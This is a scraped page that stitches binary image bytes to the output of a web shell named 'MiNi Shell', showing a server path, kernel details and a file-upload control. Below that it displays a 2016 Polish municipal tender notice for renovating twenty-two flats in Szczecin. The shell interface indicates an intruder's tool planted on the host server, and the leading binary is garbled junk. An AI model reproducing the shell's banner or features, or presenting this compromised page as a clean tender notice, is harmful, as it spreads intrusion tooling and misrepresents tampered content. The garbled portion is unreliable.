JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160126/17716-N-2016.html

<p class="kh_header"><b>Szczecin: Wykonanie remontu dwudziestu dwóch komunalnych lokali mieszkalnych w Szczecinie w podziale na osiem części</b><br>
<b>Numer ogłoszenia: 17716 - 2016; data zamieszczenia: 26.01.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd  Budynków i Lokali  Komunalnych , ul. Mariacka 25, 70-546 Szczecin, woj. zachodniopomorskie, tel. 91 4886333, 91 4886301, faks 91 4893831, 91 4893832.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:/WWW.ZBiLK.szczecin.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie remontu dwudziestu dwóch komunalnych lokali mieszkalnych w Szczecinie w podziale na osiem części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest wykonanie remontu dwudziestu dwóch komunalnych lokali mieszkalnych w Szczecinie, w podziale na osiem części:
1)	 Część 1 - remont lokali mieszkalnych przy ul. Światowida 30/1,  Światowida 96/12, Dąbrówki 1F/7, Studzienna 15/1;
2)	 Część 2 - remont lokali mieszkalnych przy ul. Retry 9/14, Sławomira 15/13;
3)	 Część 3 - remont lokali mieszkalnych przy ul. Bandurskiego 4/3,  Nehringa 15/3, Rugiańska 38/4;
4)	 Część 4 - remont lokali mieszkalnych przy ul. Długosza 1/15, Długosza 24/7, Boguchwały 4/6;
5)	 Część 5 - remont lokali mieszkalnych przy ul. Marcina 55/8, Parkowa 60/3, Swarożyca 6/25;
6)	 Część 6 - remont lokali mieszkalnych przy ul. Bohaterów Warszawy 22/15, Jagiellońska 25/25, Wawrzyniaka 2/1A;
7)	 Część 7 - remont lokali mieszkalnych przy ul. Bolesława Śmiałego 47/20, Aleja Piastów 2/23;
8)	 Część 8 - remont lokali mieszkalnych przy ul. Batalionów Chłopskich 40/27, Floriana Szarego 8/15 (Skarb Państwa).


2.	Zakres remontu poszczególnych lokali mieszkalnych:

CZĘŚĆ 1
ul. Światowida 30/1 (powierzchnia użytkowa lokalu - 21,51 m2) remont w branży budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, dopasowanie skrzydeł drzwiowych, przemurowanie paleniska w piecu,  
b)	branża elektryczna - uzupełnienie osprzętu elektrycznego,
c)	branża sanitarna - wymiana elementów muszli, montaż wodomierza,

ul. Światowida 96/12 (powierzchnia użytkowa lokalu - 39,01 m2) remont w branży budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, przemurowanie paleniska w piecu, wymiana klamek z szyldami, ułożenie wykładziny, 
b)	branża elektryczna - uzupełnienie osprzętu elektrycznego,
c)  branża sanitarna - wymiana wodomierza, próba instalacji gazowej,

ul. Dąbrówki 1F/7 (powierzchnia użytkowa lokalu - 28,80 m2) remont w branży budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - wymiana drzwiowi wejściowych, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych,  naprawa posadzki, montaż nawiewników okiennych, 
b)	branża elektryczna - wymiana osprzętu, tablicy, pomiary, 
c)	branża sanitarna - wymiana grzejnika stalowego, baterii, zlewozmywaka, wodomierza, ustępu, wanny, kuchenki gazowej, opinia kominiarska, próba instalacji gazowej,

ul. Studzienna 15/1 (powierzchnia użytkowa lokalu - 54,83 m2) remont w branży budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - naprawa tynków, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, wymiana stolarki drzwiowej,  montaż nawiewników okiennych, naprawa posadzki, przestawienie pieca kaflowego, montaż czujnika czadu, opinia kominiarska, remont WC poza lokalem, 
b)	branża elektryczna - wymiana instalacji i osprzętu, WLZ, tablicy, pomiary, montaż grzejników konwektorowych, 
c)	branża sanitarna - wymiana kuchenki gazowej, zlewozmywaka, ustępu, wodomierza, próba instalacji gazowej.



CZĘŚĆ 2
ul. Retry 9/14 (powierzchnia użytkowa lokalu - 29,01 m2) remont w branży budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - dwukrotne malowanie farbą emulsyjną tynków wewnętrznych,  naprawa posadzki, rekontrola kominiarska, montaż nawiewników okiennych, mycie, wywóz gruzu, 
b)	branża elektryczna - wymiana osprzętu, tablicy, pomiary, 
c)	branża sanitarna - wymiana baterii, kuchni gazowej, ustępu, próba instalacji gazowej.

ul. Sławomira 15/13 (powierzchnia użytkowa lokalu - 38,66 m2) remont w branży 
budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - naprawa tynków, wymiana stolarki drzwiowej, malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, montaż nawiewników okiennych, mycie, wywóz gruzu, 
b)	branża elektryczna - wymiana instalacji i osprzętu, tablicy, grzejnika konwektorowego, pomiary, 
c)	branża sanitarna - wymiana baterii, kuchni gazowej, zlewozmywaka, ustępu, próba instalacji gazowej.


CZĘŚĆ 3
ul. Bandurskiego 4/3 (powierzchnia użytkowa lokalu - 38,38 m2) remont w branży budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - wymiana stolarki okiennej na PCV, wymiana stolarki drzwiowej, malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu, 
b)	branża elektryczna - wymiana instalacji i osprzętu, tablicy, pomiary, 
c)	branża sanitarna - wymiana elektrycznego bojlera, kuchni gazowej, zlewozmywaka, ustępu, umywalki, montaż brodzika, próba instalacji gazowej.

ul. Nehringa 15/3 (powierzchnia użytkowa lokalu - 21,42 m2) remont w branży budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - naprawa tynków, wymiana stolarki drzwiowej, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, naprawa pieca kaflowego, montaż detektora tlenku węgla,  wywóz gruzu, 
b)	branża elektryczna - wymiana instalacji i osprzętu, pomiary, 
c)	branża sanitarna - montaż baterii, wodomierza, kuchni gazowej, próba instalacji gazowej, opinia kominiarska.

ul. Rugiańska 38/4 (powierzchnia użytkowa lokalu - 36,00 m2) remont w branży budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, montaż nawiewników okiennych, mycie, wywóz gruzu, 
b)	branża elektryczna - wymiana instalacji i osprzętu, tablic, montaż grzejnika elektrycznego konwektorowego, pomiary, 
c)	branża sanitarna - montaż wodomierza, wymiana zlewozmywaka, kuchni gazowej, baterii, ustępu, próba instalacji gazowej, roboty dodatkowe.

CZĘŚĆ 4
ul. Długosza 1/15 (powierzchnia użytkowa lokalu - 56,60 m2) remont w branży budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - przestawienie pieca kaflowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki,  montaż nawiewników okiennych, wywóz gruzu, 
b)	branża elektryczna - wymiana instalacji i osprzętu, tablicy, montaż grzejnika elektrycznego konwektorowego, roboty uzupełniające, pomiary, 
c)	branża sanitarna - wymiana kuchni gazowej, wodomierza, zlewozmywaka, ustępu,  próba instalacji gazowej

ul. Długosza 24/7 (powierzchnia użytkowa lokalu - 34,47 m2) remont w branży budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - przestawienie pieca kaflowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, montaż nawiewników okiennych,  rekontrola kominiarska, wywóz gruzu, 
b)	branża elektryczna - wymiana instalacji i osprzętu, roboty uzupełniające, pomiary, 
c)	branża sanitarna - wymiana baterii, kuchni gazowej, zlewozmywaka,  ustępu, próba instalacji gazowej

ul. Boguchwały 4/6 (powierzchnia użytkowa lokalu - 32,39 m2) remont w branży budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - montaż nawiewników okiennych, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu, 
b)	branża elektryczna - wymiana tablicy, roboty demontażowe, prace instalacyjne, pomiary, 
c)	branża sanitarna - wymiana pieca gazowego, montaż grzejnika stalowego, umywalki,  wanny, wymiana baterii, wodomierza, zlewozmywaka,  montaż detektora tlenku węgla, próba instalacji gazowej.


CZĘŚĆ 5
ul. Marcina 55/8 (powierzchnia użytkowa lokalu - 29,82 m2) remont w branży 
budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - wymiana stolarki okiennej,  przestawienie pieca kaflowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wywóz gruzu, 
b)	branża elektryczna - wymiana instalacji i osprzętu, tablicy, montaż grzejnika elektrycznego konwektorowego, pomiary, 
c)	branża sanitarna - wymiana kuchni gazowej, zlewozmywaka, baterii, ustępu, montaż wodomierza, próba instalacji gazowej,

ul. Parkowa 60/3 (powierzchnia użytkowa lokalu - 33,07 m2) remont w branży 
budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, montaż nawiewników okiennych, przemurowanie kominów, rekontrola kominiarska, wywóz gruzu, 
b)	branża elektryczna - częściowa wymiana instalacji i osprzętu, roboty uzupełniające, pomiary, 
c)	branża sanitarna - wymiana kuchni gazowej, wodomierza, zlewozmywaka, baterii, ustępu, próba instalacji gazowej,

ul. Swarożyca 6/25 (powierzchnia użytkowa lokalu - 42,56 m2) remont w branży 
budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, przestawienie pieca kaflowego, naprawa posadzki, wymiana stolarki okiennej, wywóz gruzu, 
b)	branża elektryczna - wymiana osprzętu, tablicy, roboty uzupełniające, pomiary, 
c)	branża sanitarna - wymiana kuchni gazowej, wodomierza, zlewozmywaka, baterii,  próba instalacji gazowej.


CZĘŚĆ 6
ul. Bohaterów Warszawy 22/15 (powierzchnia użytkowa lokalu - 30,28 m2) remont 
w branży budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - przestawienie pieca kaflowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, przegląd kominiarski, wywóz gruzu, 
b)	branża elektryczna - wymiana instalacji  WLZ, wymiana instalacji i osprzętu, montaż grzejnika elektrycznego konwektorowego, pomiary, 
c)	branża sanitarna - wymiana kuchni gazowej, zlewozmywaka, montaż wodomierza, próba instalacji gazowej,

ul. Jagiellońska 25/25 (powierzchnia użytkowa lokalu - 41,25 m2) remont w branży budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - przestawienie pieca kaflowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, wymiana stolarki drzwiowej, rekontrola kominiarska,  wywóz gruzu, 
b)	branża elektryczna - wymiana instalacji i osprzętu, tablicy, pomiary, 
c)	branża sanitarna - montaż kuchni gazowej, zlewozmywaka, baterii,  wodomierza, próba instalacji gazowej,

ul. Wawrzyniaka 2/1A (powierzchnia użytkowa lokalu - 19,86 m2) remont w branży 
budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - przecieranie tynków, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, szklenie, przegląd kominiarski, wywóz gruzu, 
b)	branża elektryczna - sprawdzenie instalacji WLZ, wymiana instalacji i osprzętu, tablicy, pomiary, 
c)	branża sanitarna - wymiana zlewozmywaka, baterii, ustępu, wentylacja z blachy stalowej, opinia kominiarska, próba instalacji gazowej.



CZĘŚĆ 7
ul. Bolesława Śmiałego 47/20 (powierzchnia użytkowa lokalu - 32,59 m2) remont 
w branży budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - przestawienie pieca kaflowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, montaż nawiewników okiennych, wymiana stolarki drzwiowej, remont WC na klatce schodowej, rekontrola kominiarska, wywóz gruzu, 
b)	branża elektryczna - wymiana instalacji i osprzętu, montaż grzejnika elektrycznego konwektorowego, pomiary, 
c)	branża sanitarna - montaż kuchni gazowej, baterii, wodomierza, zlewozmywaka, ustępu, próba instalacji gazowej,

ul. Aleja Piastów 2/23 (powierzchnia użytkowa lokalu - 51,65 m2) remont w branży 
budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - przestawienie pieca kaflowego, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, montaż nawiewników okiennych, rekontrola kominiarska, wywóz gruzu, 
b)	branża elektryczna - wymiana instalacji i osprzętu, tablicy, pomiary, 
c)	branża sanitarna - wymiana kuchni gazowej, baterii, wodomierza, zlewozmywaka, ustępu, próba instalacji gazowej.


CZĘŚĆ 8
ul. Batalionów Chłopskich 40/27 (powierzchnia użytkowa lokalu - 30,81 m2) remont 
w branży budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - przecieranie tynków, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, naprawa posadzki, montaż nawiewników okiennych, wymiana stolarki drzwiowej, wywóz gruzu, 
b)	branża elektryczna - wymiana tablicy licznikowej, gniazd, puszek, pomiary, 
c)	branża sanitarna - wymiana kuchni gazowej, baterii, montaż wodomierza, zlewozmywaka, ustępu, próba instalacji gazowej, opinia kominiarska

ul. Floriana Szarego 8/15 (powierzchnia użytkowa lokalu - 41,83 m2) remont w branży 
budowlanej, sanitarnej i elektrycznej:
a)	branża budowlana - wykonanie gładzi gipsowych, dwukrotne malowanie farbą emulsyjną tynków wewnętrznych, wymiana okien, wymiana drzwi, wywóz gruzu, 
b)	branża elektryczna - wymiana instalacji i osprzętu, pomiary, 
c)	branża sanitarna - wymiana kuchni gazowej, baterii, zlewozmywaka, ustępu, próba instalacji gazowej.


3.	Przedmiot zamówienia należy wykonać zgodnie ze Specyfikacją Techniczną Wykonania i Odbioru Robót Budowlanych, warunkami technicznymi oraz sztuką budowlaną. Roboty należy prowadzić zgodnie z obowiązującymi przepisami bezpieczeństwa i higieny pracy przy wykonywaniu robót budowlanych i przepisami p.poż.
4.	Wykonawca jest wytwarzającym odpady w rozumieniu przepisów ustawy o odpadach z dnia 14 grudnia 2012 r. (Dz. U. z 2013 r., poz. 21). Wykonawca w trakcie realizacji przedmiotu zamówienia ma obowiązek w pierwszej kolejności poddania odpadów budowlanych (odpadów betonowych, ziemi gruzu budowlanego) odzyskowi, a jeżeli z przyczyn technologicznych jest on niemożliwy lub nieuzasadniony z przyczyn ekologicznych lub ekonomicznych, to Wykonawca zobowiązany jest do przekazania powstałych odpadów do unieszkodliwienia. Wykonawca zobowiązany jest udokumentować Zamawiającemu sposób gospodarowania tymi odpadami (utylizacja, wywóz gruzu itp.) jako warunek dokonania odbioru końcowego realizowanego zamówienia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.41-1, 45.45.30.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 70.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wadium należy wnieść w wysokości: 
1)	dla Części 1 zamówienia - (ul. Światowida 30/1,  Światowida 96/12, Dąbrówki 1F/7, Studzienna 15/1) - 812,00 zł (słownie: osiemset dwanaście złotych),
2)	dla Części 2 zamówienia (ul. Retry 9/14, Sławomira 15/13) - 808,00 zł 
(słownie: osiemset osiem złotych),
3)	dla Części 3 zamówienia (ul. Bandurskiego 4/3,  Nehringa 15/3, Rugiańska 38/4) - 972,00 zł (słownie: dziewięćset siedemdziesiąt dwa złote),
4)	dla Części 4 zamówienia (ul. Długosza 1/15, Długosza 24/7, Boguchwały 4/6) - 934,00 zł (słownie: dziewięćset trzydzieści cztery złote),
5)	dla Części 5 zamówienia (ul. Marcina 55/8, Parkowa 60/3, Swarożyca 6/25) 
- 989,00 zł (słownie: dziewięćset osiemdziesiąt dziewięć złotych),
6)	dla Części 6 zamówienia (ul. Bohaterów Warszawy 22/15, Jagiellońska 25/25, Wawrzyniaka 2/1A) - 918,00 zł (słownie: dziewięćset osiemnaście złotych),
7)	dla Części 7 zamówienia (ul. Bolesława Śmiałego 47/20, Aleja Piastów 2/23) 
- 762,00 zł (słownie: siedemset sześćdziesiąt dwa złote),
8)	dla Części 8 zamówienia (Skarb Państwa: ul. Batalionów Chłopskich 40/27, Floriana Szarego 8/15) - 635,00 zł (słownie: sześćset trzydzieści pięć złotych),
w terminie do dnia 12.02.2016 do godz. 10:00. Decyduje data wpływu środków do  zamawiającego.
2. Wadium może być wnoszone: 
1) w pieniądzu - przelewem na konto ZBiLK w PKOBP nr 36 1020 4795 0000 9302 0292 7648 
2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2) ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
 Dokumenty, o których mowa w pkt 2 należy zdeponować w siedzibie ZBiLK przy ul. Mariackiej 25, pokój nr 12 przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że wykonał należycie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum jedną najważniejszą robotę budowlaną. Za jedną najważniejszą robotę budowlaną zamawiający uzna, wykonanie minimum jednego remontu lokalu mieszkalnego we wszystkich branżach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jedną osobą, posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej. 
UWAGA: Na podstawie art. 104 ustawy z dnia 7 lipca 1994 roku Prawo budowlane (Dz. U. z 2013 r., poz. 1409) osoby, które, przed dniem wejścia w życie ustawy, uzyskały uprawnienia budowlane lub stwierdzenie posiadania przygotowania zawodowego do pełnienia samodzielnych funkcji technicznych w budownictwie, zachowują uprawnienia do pełnienia tych funkcji w dotychczasowym zakresie. Zakres uprawnień budowlanych należy odczytywać zgodnie z treścią decyzji o ich nadaniu i w oparciu o przepisy będące podstawą ich nadania. Ponadto, zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie, określone w art. 12 ust. 1 ustawy Prawo budowlane, mogą również wykonywać osoby, których odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu spełniania warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

